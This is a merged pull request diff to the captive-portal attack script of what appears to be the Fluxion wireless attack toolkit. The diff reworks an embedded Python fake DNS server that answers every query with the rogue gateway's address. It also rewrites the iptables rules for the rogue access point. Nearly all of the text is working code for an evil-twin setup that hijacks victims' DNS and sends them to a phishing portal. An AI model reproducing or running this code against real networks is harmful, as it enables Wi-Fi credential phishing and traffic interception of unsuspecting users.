Merge pull request #444 from rad4day/captive_portal_fix

Captive portal fix

attacks/Captive Portal/attack.sh

@@ -711,48 +711,53 @@ index-file.names = (
 
   # Create a DNS service with python, forwarding all traffic to gateway.
   echo "\
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
 import socket
 
+
 class DNSQuery:
-  def __init__(self, data):
+    def __init__(self, data):
-    self.data=data
+        self.data=data
-    self.dominio=''
+        self.dominio=''
 
-    tipo = (ord(data[2]) >> 3) & 15
+        tipo = (ord(data[2]) >> 3) & 15
-    if tipo == 0:
+        if tipo == 0:
-      ini=12
+            ini=12
-      lon=ord(data[ini])
+            lon=ord(data[ini])
-      while lon != 0:
+            while lon != 0:
-        self.dominio+=data[ini+1:ini+lon+1]+'.'
+                self.dominio+=data[ini + 1:ini + lon + 1] + '.'
-        ini+=lon+1
+                ini += lon + 1
-        lon=ord(data[ini])
+                lon=ord(data[ini])
+
+    def respuesta(self, ip):
+        packet=''
+        if self.dominio:
+            packet+=self.data[:2] + '\x81\x80'
+            packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
+            packet+=self.data[12:]
+            packet+='\xc0\x0c'
+            packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
+            packet+=str.join('', map(lambda x: chr(int(x)), ip.split('.')))
+        return packet
 
-  def respuesta(self, ip):
-    packet=''
-    if self.dominio:
-      packet+=self.data[:2] + \"\x81\x80\"
-      packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
-      packet+=self.data[12:]
-      packet+='\xc0\x0c'
-      packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
-      packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
-    return packet
 
 if __name__ == '__main__':
-  ip='$CaptivePortalGatewayAddress'
+    ip='$CaptivePortalGatewayAddress'
-  print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
+    print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
 
-  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-  udps.bind(('',53))
+    udps.bind((ip, 53))
 
-  try:
+    try:
-    while 1:
+        while True:
-      data, addr = udps.recvfrom(1024)
+            data, addr = udps.recvfrom(1024)
-      p=DNSQuery(data)
+            p=DNSQuery(data)
-      udps.sendto(p.respuesta(ip), addr)
+            udps.sendto(p.respuesta(ip), addr)
-      print 'Request: %s -> %s' % (p.dominio, ip)
+            print 'Request: %s -> %s' % (p.dominio, ip)
-  except KeyboardInterrupt:
+    except KeyboardInterrupt:
-    print 'Finalizando'
+        print 'Finalizando'
     udps.close()\
 " >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
 
@@ -1090,8 +1095,7 @@ captive_portal_unset_routes() {
   ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null
 }
 
-# Set up DHCP / WEB server
+# Set up DHCP / WEB server / DNS Firewall
-# Set up DHCP / WEB server
 captive_portal_set_routes() {
   # Give an address to the gateway interface in the rogue network.
   # This makes the interface accessible from the rogue network.
@@ -1107,15 +1111,10 @@ captive_portal_set_routes() {
   iptables --table nat --flush
   iptables --delete-chain
   iptables --table nat --delete-chain
-  iptables -P FORWARD ACCEPT
+  iptables -A INPUT -p tcp --dport 443 -j ACCEPT
-
+  iptables -A INPUT -p tcp --dport 80 -j ACCEPT
-  iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \
+  iptables -A INPUT -p udp --dport 53 -j ACCEPT
-    --to-destination $CaptivePortalGatewayAddress:80
+  iptables -A INPUT -p udp --dport 67 -j ACCEPT
-  iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \
-    --to-destination $CaptivePortalGatewayAddress:443
-  iptables -A INPUT -p tcp --sport 443 -j ACCEPT
-  iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
-  iptables -t nat -A POSTROUTING -j MASQUERADE
 }
 
 captive_portal_stop_interface() {